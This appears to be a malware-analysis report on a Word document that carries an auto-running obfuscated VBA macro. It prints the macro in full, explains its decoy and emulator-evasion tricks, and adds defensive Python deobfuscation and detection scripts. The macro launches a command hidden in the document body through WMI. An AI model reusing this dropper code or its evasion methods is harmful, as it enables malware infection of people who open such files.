Verdict: MALICIOUS (risk score 112)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1105 Ingress Tool Transfer
The sample carries a VBA macro that runs as soon as the document is opened (Document_open in ThisDocument). Most of the listing is decoy: every block that creates a Scripting.FileSystemObject and writes a one-space text file under K:\ sits between a GoTo and the label it jumps to, so those CreateObject calls and file writes are never executed. They exist to flood static scanners with harmless-looking indicators, and each label reuses the name of a dead variable so that casual reading and automated renaming trip over it; the CreateObject line quoted by the heuristics below is one of these dead decoys, while the live CreateObject is the one whose argument is built at run time. That live path is short: string fragments padded with the marker "]e1r[S" are concatenated, the marker is stripped with Replace (its replacement argument is an undeclared variable, i.e. an empty Variant), and the result is the WMI moniker "winmgmts:win32_process". The one character not stored in the macro comes from Mid(Application.Name, 6, 1), which yields "s" for any host whose Application.Name starts with "Microsoft " (here Word), so the moniker breaks in an emulator or non-Office host that reports a different name. The macro then takes the document's main text story (StoryRanges.Item(4 / 4), i.e. story 1), discards its first four characters, runs the remainder through the same marker-stripping function, and passes it to Win32_Process.Create as the command line (ATT&CK T1047, Windows Management Instrumentation). The second stage is therefore whatever command is hidden in the document body, which is not part of the extracted artifact; the T1105 mapping is an inference about what such a command typically does (download and run a payload), not something visible in the macro itself. On Error Resume Next suppresses every failure along the way.
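The live path described above can be recovered mechanically. The following Python script is an added example, not part of this report or of the olevba tooling: it takes an excerpt of the assignment lines copied from the macros.bas listing on this page (one dead FileSystemObject block kept so the stripping is visible), removes every line between a GoTo and its label, evaluates the remaining string expressions the way VBA would (literal concatenation, Mid(Application.Name, 6, 1) supplied from a host name you choose, undeclared variables treated as empty), and finally removes the "]e1r[S" marker as the sample's Replace call does. The host name "Microsoft Word" and the treatment of the undeclared Replace argument as an empty string are assumptions about the runtime and are labelled in the code.

```python
import re

MARKER = "]e1r[S"  # junk token the macro inserts into every string fragment

# Assignment lines copied from the macros.bas listing on this page, with one of
# the dead FileSystemObject blocks kept so the GoTo/label stripping is visible.
MACRO_EXCERPT = r'''
snahbsd = "]e1r[Sp]e1r[S"
Vewmpzqdsdmz0 = "]e1r[Sro]e1r[S]e1r[Sce]e1r[Ss]e1r[Ss]e1r[S]e1r[S"
GoTo pdOkE
Dim oFctFMsrd As Object
Set oFctFMsrd = CreateObject("Scripting.FileSystemObject")
Dim pdOkE As Object
Set pdOkE = oFctFMsrd.CreateTextFile("K:\ClHJF\KjfZSj.QStIkAjCI")
pdOkE.WriteLine " "
pdOkE.Close
Set oFctFMsrd = Nothing
Set pdOkE = Nothing
pdOkE:
Lsj29a5jtune = "]e1r[S:w]e1r[S]e1r[Sin]e1r[S3]e1r[S2]e1r[S_]e1r[S"
Znhqkk_3t24a05 = "w]e1r[Sin]e1r[Sm]e1r[Sgm]e1r[St]e1r[S]e1r[S"
D3e6a4x_kl7w8v25 = "]e1r[S" + Mid(Application.Name, 6, 1) + "]e1r[S"
Eztt8ybo8tsmj = Znhqkk_3t24a05 + D3e6a4x_kl7w8v25 + Lsj29a5jtune + snahbsd + Vewmpzqdsdmz0
'''


def strip_goto_dead_blocks(src):
    """Return the statements VBA can actually reach: everything between a
    `GoTo X` and the label `X:` is skipped, exactly as the interpreter would."""
    live, skip_to = [], None
    for line in (l.strip() for l in src.splitlines()):
        if not line:
            continue
        if skip_to is not None:           # inside a dead block
            if line == skip_to + ":":
                skip_to = None            # label reached, execution resumes here
            continue
        m = re.fullmatch(r"GoTo\s+(\w+)", line)
        if m:
            skip_to = m.group(1)
            continue
        live.append(line)
    return live


def eval_vba_string(expr, env, app_name):
    """Evaluate the only expression forms the sample uses: "literal",
    a variable name, Mid(Application.Name, start, length), joined with +."""
    value = ""
    for term in (t.strip() for t in expr.split("+")):   # no literal here contains '+'
        if term.startswith('"') and term.endswith('"'):
            value += term[1:-1]
            continue
        m = re.fullmatch(r"Mid\(Application\.Name,\s*(\d+),\s*(\d+)\)", term)
        if m:
            start, length = int(m.group(1)), int(m.group(2))
            value += app_name[start - 1:start - 1 + length]  # VBA Mid is 1-based
            continue
        value += env.get(term, "")   # assumption: an undeclared variable is Empty, i.e. ""
    return value


def emulate(src, app_name="Microsoft Word"):
    """Run the live assignments in order and return the resulting variables."""
    env = {}
    for line in strip_goto_dead_blocks(src):
        m = re.fullmatch(r"(\w+)\s*=\s*(.+)", line)
        if m and not line.startswith(("Set ", "Dim ")):
            env[m.group(1)] = eval_vba_string(m.group(2), env, app_name)
    return env


def recover_moniker(app_name="Microsoft Word"):
    """The string the macro hands to CreateObject once Replace() has dropped the
    marker. app_name is an assumption about the host; Word is what the sample
    expects, since ThisDocument.StoryRanges only exists there."""
    return emulate(MACRO_EXCERPT, app_name)["Eztt8ybo8tsmj"].replace(MARKER, "")


if __name__ == "__main__":
    print(recover_moniker())              # winmgmts:win32_process
    print(recover_moniker("WINWORD"))     # host-name check fails: winmgmtR:win32_process
```

Feeding a host name that does not start with "Microsoft " shows why the sample never stores the letter "s" itself: the moniker only assembles correctly inside a real Office host, which is a cheap evasion against script emulators that report a different Application.Name.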
Heuristics (6)

- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code.
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: Set VXNen = CreateObject("Scripting.FileSystemObject")
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro [low] OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script: Private Sub Document_open()
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace that ordinary Office documents carry, not an attacker-controlled address.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6590 bytes |

SHA-256: f392ec7de4bc91e9168573ed3554ded1ffa8839807d0d22211a4c7f8e84a6f24
Detection

- ClamAV: No threats found
- Obfuscation or payload: likely. 63 of 121 identifiers look randomly generated (e.g. 'Ohlvd99n2cfq8uwvxx'), consistent with name-mangling obfuscation.
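Two of the checks the report lists can be reproduced in a few lines. The script below is an added example, not the analyzer's own code: autoexec_exec_pair implements the OLE_VBA_PCODE_AUTOEXEC_EXEC rule as the heuristics section describes it (an auto-exec entry point and an execution token in the same stream, matched case-insensitively as whole tokens, neither alone sufficient), and mangled_identifier_ratio is one way to produce a figure like "63 of 121 identifiers look randomly generated". The report does not say which criteria its identifier check uses; the four signals here (digits inside the name, vowel ratio below 0.25, four consonants in a row, three or more case switches, with two signals flagging a name of six or more characters) are an assumption labelled in the code, and the sample stream is constructed from lines of the listing on this page.

```python
import re

AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")
VBA_KEYWORDS = {"private", "public", "sub", "function", "end", "on", "error", "resume",
                "next", "goto", "dim", "as", "object", "set", "nothing", "if", "then",
                "else", "for", "to", "each", "in", "do", "loop", "while", "exit", "call",
                "attribute", "true", "false", "and", "or", "not", "const", "new", "with"}
VOWELS = set("aeiouAEIOU")


def _has_token(text, token):
    """Whole-token, case-insensitive match so 'Shell' does not fire on 'ShellExecute'."""
    pattern = r"(?<![A-Za-z0-9_])" + re.escape(token) + r"(?![A-Za-z0-9_])"
    return re.search(pattern, text, re.I) is not None


def autoexec_exec_pair(stream):
    """OLE_VBA_PCODE_AUTOEXEC_EXEC as the report describes it: fires only when an
    auto-exec entry point AND an execution token co-occur in one stream."""
    text = stream.decode("latin-1") if isinstance(stream, bytes) else stream
    auto = [t for t in AUTOEXEC_TOKENS if _has_token(text, t)]
    execs = [t for t in EXEC_TOKENS if _has_token(text, t)]
    return {"hit": bool(auto and execs), "autoexec": auto, "exec": execs}


def looks_mangled(ident):
    """Assumed criteria (not the report's): two of four signals on a name of 6+ chars."""
    if len(ident) < 6:
        return False
    letters = [c for c in ident if c.isalpha()]
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters) if letters else 0.0
    switches = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    signals = [
        re.search(r"[A-Za-z]\d+[A-Za-z_]", ident) is not None,        # digits inside the name
        vowel_ratio < 0.25,                                            # unpronounceable
        re.search(r"[b-df-hj-np-tv-z]{4,}", ident, re.I) is not None,  # consonant cluster
        switches >= 3,                                                 # pKfFBvx-style casing
    ]
    return sum(signals) >= 2


def mangled_identifier_ratio(vba_source):
    """Count unique identifiers (string literals and keywords excluded) and how
    many of them look machine-generated."""
    code = re.sub(r'"[^"\n]*"', '""', vba_source)            # drop literal contents
    idents = {t for t in re.findall(r"[A-Za-z_][A-Za-z0-9_]*", code)
              if t.lower() not in VBA_KEYWORDS}
    flagged = sorted(t for t in idents if looks_mangled(t))
    return {"flagged": len(flagged), "total": len(idents), "names": flagged}


# Constructed excerpt: lines taken from the macros.bas listing on this page.
SAMPLE = """Private Sub Document_open()
E969aqvph62ci_d30
End Sub
Function E969aqvph62ci_d30()
On Error Resume Next
mKbjhqs = Sr7ab05dby6ih.StoryRanges.Item(4 / 4)
GoTo pKfFBvx
Dim VXNen As Object
Set VXNen = CreateObject("Scripting.FileSystemObject")
pKfFBvx:
snahbsd = "]e1r[Sp]e1r[S"
Set Oqh8xdbnuqhoyepqzu = CreateObject(Sb9yvi_z_efnn5)
End Function
"""

if __name__ == "__main__":
    print(autoexec_exec_pair(SAMPLE.encode()))   # hit: True (Document_Open + CreateObject)
    print(mangled_identifier_ratio(SAMPLE))      # 7 of 12 identifiers flagged
```

The pairing rule is deliberately blunt because it is meant to run over p-code and cache streams where source is unavailable; on decoded source such as macros.bas it still fires, and the identifier ratio is what separates a legitimate Document_Open handler that calls CreateObject from a generated one.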
Preview script (first 1,000 lines of the extracted script; macros.bas is 217 lines, so it is shown in full)

```vba
Attribute VB_Name = "Sr7ab05dby6ih"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
E969aqvph62ci_d30
End Sub
Attribute VB_Name = "Nnvw4iz8xouj3lt"
Attribute VB_Name = "Ohlvd99n2cfq8uwvxx"
Function E969aqvph62ci_d30()
On Error Resume Next
mKbjhqs = Sr7ab05dby6ih.StoryRanges.Item(4 / 4)
GoTo pKfFBvx
Dim VXNen As Object
Set VXNen = CreateObject("Scripting.FileSystemObject")
Dim pKfFBvx As Object
Set pKfFBvx = VXNen.CreateTextFile("K:\eRKaiHc\fMmmK.HlSVK")
pKfFBvx.WriteLine " "
pKfFBvx.Close
Set VXNen = Nothing
Set pKfFBvx = Nothing
pKfFBvx:
snahbsd = "]e1r[Sp]e1r[S"
Vewmpzqdsdmz0 = "]e1r[Sro]e1r[S]e1r[Sce]e1r[Ss]e1r[Ss]e1r[S]e1r[S"
GoTo pdOkE
Dim oFctFMsrd As Object
Set oFctFMsrd = CreateObject("Scripting.FileSystemObject")
Dim pdOkE As Object
Set pdOkE = oFctFMsrd.CreateTextFile("K:\ClHJF\KjfZSj.QStIkAjCI")
pdOkE.WriteLine " "
pdOkE.Close
Set oFctFMsrd = Nothing
Set pdOkE = Nothing
pdOkE:
Lsj29a5jtune = "]e1r[S:w]e1r[S]e1r[Sin]e1r[S3]e1r[S2]e1r[S_]e1r[S"
GoTo KIIZL
Dim mLZGICD As Object
Set mLZGICD = CreateObject("Scripting.FileSystemObject")
Dim KIIZL As Object
Set KIIZL = mLZGICD.CreateTextFile("K:\ZkyETFAj\iEiDjHB.jSEcDKBC")
KIIZL.WriteLine " "
KIIZL.Close
Set mLZGICD = Nothing
Set KIIZL = Nothing
KIIZL:
Znhqkk_3t24a05 = "w]e1r[Sin]e1r[Sm]e1r[Sgm]e1r[St]e1r[S]e1r[S"
GoTo wxDVA
Dim wCzZAHZGH As Object
Set wCzZAHZGH = CreateObject("Scripting.FileSystemObject")
Dim wxDVA As Object
Set wxDVA = wCzZAHZGH.CreateTextFile("K:\tjLkgHCi\sUaxoAHJ.jNxhHJFFm")
wxDVA.WriteLine " "
wxDVA.Close
Set wCzZAHZGH = Nothing
Set wxDVA = Nothing
wxDVA:
D3e6a4x_kl7w8v25 = "]e1r[S" + Mid(Application.Name, 6, 1) + "]e1r[S"
GoTo AQOmiJI
Dim NKaqpI As Object
Set NKaqpI = CreateObject("Scripting.FileSystemObject")
Dim AQOmiJI As Object
Set AQOmiJI = NKaqpI.CreateTextFile("K:\ZKUdd\vgerA.hFoxD")
AQOmiJI.WriteLine " "
AQOmiJI.Close
Set NKaqpI = Nothing
Set AQOmiJI = Nothing
AQOmiJI:
Eztt8ybo8tsmj = Znhqkk_3t24a05 + D3e6a4x_kl7w8v25 + Lsj29a5jtune + snahbsd + Vewmpzqdsdmz0
GoTo gqvBAAj
Dim wecHG As Object
Set wecHG = CreateObject("Scripting.FileSystemObject")
Dim gqvBAAj As Object
Set gqvBAAj = wecHG.CreateTextFile("K:\ZJBjJDJJ\NGiRIGHJ.hkrGDCHD")
gqvBAAj.WriteLine " "
gqvBAAj.Close
Set wecHG = Nothing
Set gqvBAAj = Nothing
gqvBAAj:
Sb9yvi_z_efnn5 = Bt44vibhy4x5f7(Eztt8ybo8tsmj)
GoTo ywsqIZP
Dim bZWUG As Object
Set bZWUG = CreateObject("Scripting.FileSystemObject")
Dim ywsqIZP As Object
Set ywsqIZP = bZWUG.CreateTextFile("K:\MBClDPC\RumKEBv.HASdHyTG")
ywsqIZP.WriteLine " "
ywsqIZP.Close
Set bZWUG = Nothing
Set ywsqIZP = Nothing
ywsqIZP:
Set Oqh8xdbnuqhoyepqzu = CreateObject(Sb9yvi_z_efnn5)
GoTo HvzSWpDHG
Dim IGEDA As Object
Set IGEDA = CreateObject("Scripting.FileSystemObject")
Dim HvzSWpDHG As Object
Set HvzSWpDHG = IGEDA.CreateTextFile("K:\VvozNJI\jXhgFE.IgwxrnBC")
HvzSWpDHG.WriteLine " "
HvzSWpDHG.Close
Set IGEDA = Nothing
Set HvzSWpDHG = Nothing
HvzSWpDHG:
Chvd3e6k5mklpfdz8 = Mid(mKbjhqs, (15 / 3), Len(mKbjhqs))
GoTo ptZeyI
Dim imMRy As Object
Set imMRy = CreateObject("Scripting.FileSystemObject")
Dim ptZeyI As Object
Set ptZeyI = imMRy.CreateTextFile("K:\wVfBC\sEaVHeAG.rpBcHvJ")
ptZeyI.WriteLine " "
ptZeyI.Close
Set imMRy = Nothing
Set ptZeyI = Nothing
ptZeyI:
GoTo clXpJJq
Dim fFgTdHD As Object
Set fFgTdHD = CreateObject("Scripting.FileSystemObject")
Dim clXpJJq As Object
Set clXpJJq = fFgTdHD.CreateTextFile("K:\HKHWECHH\kUaGBIJCH.PNiAIAGF")
clXpJJq.WriteLine " "
clXpJJq.Close
Set fFgTdHD = Nothing
Set clXpJJq = Nothing
clXpJJq:
Oqh8xdbnuqhoyepqzu.Create Bt44vibhy4x5f7(Chvd3e6k5mklpfdz8), Trmozv619aabvf, Ls9faiq5dk3kpsz
GoTo SOoGw
Dim gZcRCIx As Object
Set gZcRCIx = CreateObject("Scripting.FileSystemObject")
Dim SOoGw As Object
Set SOoGw = gZcRCIx.CreateTextFile("K:\PiAcNSDM\mdQHIJ.UwJfInGXz")
SOoGw.WriteLine " "
SOoGw.Close
Set gZcRCIx = Nothing
Set SOoGw = Nothing
SOoGw:
GoTo DxuFHeAD
Dim SZVcYQB As Object
Set SZVcYQB = CreateObject("Scripting.FileSystemObject")
Dim DxuFHeAD As Object
Set DxuFHeAD = SZVcYQB.CreateTextFile("K:\ygOaDNWF\AsYwak.yxiiHsEB")
DxuFHeAD.WriteLine " "
DxuFHeAD.Close
Set SZVcYQB = Nothing
Set DxuFHeAD = Nothing
DxuFHeAD:
End Function
Function Bt44vibhy4x5f7(Pjrala_j0a04tk)
On Error Resume Next
GoTo QpTqo
Dim MctUXIC As Object
Set MctUXIC = CreateObject("Scripting.FileSystemObject")
Dim QpTqo As Object
Set QpTqo = MctUXIC.CreateTextFile("K:\irKuyQW\YWPpAL.FdShAJWG")
QpTqo.WriteLine " "
QpTqo.Close
Set MctUXIC = Nothing
Set QpTqo = Nothing
QpTqo:
D_bomx85444o16yx = (Pjrala_j0a04tk)
GoTo FFgKqAE
Dim TSpmCCFH As Object
Set TSpmCCFH = CreateObject("Scripting.FileSystemObject")
Dim FFgKqAE As Object
Set FFgKqAE = TSpmCCFH.CreateTextFile("K:\IkWWdEHAC\oWfLCIq.xBefzEdJ")
FFgKqAE.WriteLine " "
FFgKqAE.Close
Set TSpmCCFH = Nothing
Set FFgKqAE = Nothing
FFgKqAE:
Epcesn9hep6 = P_qukkcejk_5gp(D_bomx85444o16yx)
GoTo mjAlMJYF
Dim EQaaBNLA As Object
Set EQaaBNLA = CreateObject("Scripting.FileSystemObject")
Dim mjAlMJYF As Object
Set mjAlMJYF = EQaaBNLA.CreateTextFile("K:\vsrPq\aMIjKHuE.LrPYBWZ")
mjAlMJYF.WriteLine " "
mjAlMJYF.Close
Set EQaaBNLA = Nothing
Set mjAlMJYF = Nothing
mjAlMJYF:
Bt44vibhy4x5f7 = Epcesn9hep6
GoTo rxagBGIFG
Dim eDfBiJxHB As Object
Set eDfBiJxHB = CreateObject("Scripting.FileSystemObject")
Dim rxagBGIFG As Object
Set rxagBGIFG = eDfBiJxHB.CreateTextFile("K:\UkQjbyD\igfWIWBx.ceyGBIE")
rxagBGIFG.WriteLine " "
rxagBGIFG.Close
Set eDfBiJxHB = Nothing
Set rxagBGIFG = Nothing
rxagBGIFG:
End Function
Function P_qukkcejk_5gp(G41desr2zmpoimg)
Utzyq6pfft0 = Bg_2dqrbvn8jy7w8t
GoTo JsxmUHX
Dim RXMiCxGIG As Object
Set RXMiCxGIG = CreateObject("Scripting.FileSystemObject")
Dim JsxmUHX As Object
Set JsxmUHX = RXMiCxGIG.CreateTextFile("K:\XbOvE\EvDIGDE.HXjVJA")
JsxmUHX.WriteLine " "
JsxmUHX.Close
Set RXMiCxGIG = Nothing
Set JsxmUHX = Nothing
JsxmUHX:
P_qukkcejk_5gp = Replace(G41desr2zmpoimg, "]e1r[S", B2qkgjpe6orbdf)
GoTo dWpTEE
Dim FEDazA As Object
Set FEDazA = CreateObject("Scripting.FileSystemObject")
Dim dWpTEE As Object
Set dWpTEE = FEDazA.CreateTextFile("K:\oRgzGHEA\CDFCQJBm.vIgVF")
dWpTEE.WriteLine " "
dWpTEE.Close
Set FEDazA = Nothing
Set dWpTEE = Nothing
dWpTEE:
End Function
```